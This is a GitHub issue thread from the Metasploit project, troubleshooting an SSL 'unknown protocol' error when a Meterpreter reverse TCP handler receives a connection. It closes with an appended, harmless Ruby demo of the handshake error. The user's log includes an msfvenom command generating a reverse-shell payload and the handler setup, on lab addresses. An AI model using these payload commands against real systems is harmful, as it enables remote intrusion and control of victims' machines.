rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol #8312

Closed zoo143 closed 7 years ago

zoo143 commented 7 years ago

Steps to reproduce

How'd you do it?

  1. payload windows/meterpreter/reverse_tcp
  2. exploit

Expected behavior

It's to obtain a meterpreter session. The Meterpreter prompt should show up as below.

[*] Sending stage (884270 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.4:4444 -> 192.168.56.1:56007) at 2015-07-13 00:04:26 +0900

meterpreter >

Current behavior

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.56.4:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.56.119
[-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol

Metasploit version

Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).

I installed Metasploit with:

OS

Linux kali32 4.6.0-kali1-686-pae #1 SMP Debian 4.6.4-1kali1 (2016-07-21) i686 GNU/Linux

timwr commented 7 years ago

How are you generating the payload? msfvenom? Can you post the logs?

zoo143 commented 7 years ago

Thanks. I used msfvenom, and below is the console log.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=4444 -f python
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of python file: 1602 bytes
root@kali32:~#
root@kali32:~# msfconsole

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) >
msf exploit(handler) > set LHOST 192.168.56.4
LHOST => 192.168.56.4
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.56.4     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.56.4:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.56.119
[-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol

busterb commented 7 years ago

How did you invoke your payload with format 'python' on the target?

busterb commented 7 years ago

I noticed your expected behavior section is from 2015. Are you following some sort of tutorial or blog post about exploiting python programs?

zoo143 commented 7 years ago

Yes, I follow this blog: http://inaz2.hatenablog.com/entry/2015/07/13/011841

Thanks

busterb commented 7 years ago

I followed the blog steps and it worked as expected. I'm suspecting you pointed the Python shellcode injector at the Metasploit listener, instead of the vulnerable service. That would create the error you see here. The blog is confusing because the author uses port 4444 for both the vulnerable service and the listener. Try changing the ports and you will see what I mean.

Good luck.
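
The error text in this issue is what a server-side OpenSSL handshake reports when the first bytes from the peer are not a TLS ClientHello. The following is an added example, not part of the original thread or of Metasploit's code, that reproduces that condition in isolation; the helper names, the local socket pair and the sample bytes are constructed for illustration.

```ruby
require 'openssl'
require 'socket'

# Constructed sample: arbitrary bytes that are not a TLS record.
NON_TLS_BYTES = "\x00\x01\x02\x03 not a ClientHello".b

# Throwaway self-signed certificate, generated for this demo only.
def demo_server_context
  key = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = 1
  cert.subject = cert.issuer = OpenSSL::X509::Name.parse('/CN=demo.invalid')
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after = Time.now + 3600
  cert.sign(key, OpenSSL::Digest.new('SHA256'))
  ctx = OpenSSL::SSL::SSLContext.new
  ctx.cert = cert
  ctx.key = key
  ctx
end

# Runs a server-side handshake over a local socket pair; the block plays the
# peer. Returns [:tls_ok, nil] or [:ssl_error, message].
def accept_from(ctx)
  server_io, client_io = UNIXSocket.pair
  peer = Thread.new { yield client_io }
  OpenSSL::SSL::SSLSocket.new(server_io, ctx).accept
  [:tls_ok, nil]
rescue OpenSSL::SSL::SSLError => e
  [:ssl_error, e.message]
ensure
  server_io&.close
  peer&.join
  client_io&.close
end

def demo
  ctx = demo_server_context
  # Peer 1 speaks TLS (certificate not verified: throwaway demo cert).
  good = accept_from(ctx) { |io| OpenSSL::SSL::SSLSocket.new(io).connect }
  # Peer 2 sends raw bytes, like a client pointed at the wrong port.
  bad = accept_from(ctx) { |io| io.write(NON_TLS_BYTES) }
  { good: good, bad: bad }
end

p demo if $PROGRAM_NAME == __FILE__
```

The reason string at the end of the message depends on the OpenSSL version: older builds print "unknown protocol" as in this issue, newer ones print "wrong version number".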